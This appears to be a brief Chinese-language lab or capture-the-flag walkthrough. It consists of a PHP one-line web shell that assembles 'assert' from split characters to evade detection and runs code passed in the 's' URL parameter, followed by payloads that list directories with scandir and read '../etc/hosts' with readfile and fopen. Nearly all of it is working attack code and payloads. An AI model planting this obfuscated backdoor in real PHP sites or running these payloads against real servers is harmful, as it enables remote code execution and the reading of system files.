<?php
$poc="a#s#s#e#r#t";
$poc_1=explode("#",$poc);
$poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5];
$poc_2($_GET['s'])
?>
使用?s=print_r(scandir('./'))
进行目录扫描以发现代码的执行漏洞
利用此漏洞查询其他文件,例如hosts
首先,扫描上级目录,payload
?s=print_r(scandir('../'))
看到这是linux操作系统的文件目录
所以hosts应该在etc里面,读一下就能看到了。
使用fopen() 或者 readfile() 函数读取文件
?s=print_r(readfile('../etc/hosts'))
?s=print_r(fopen('../etc/hosts','r'))
完成文件读取。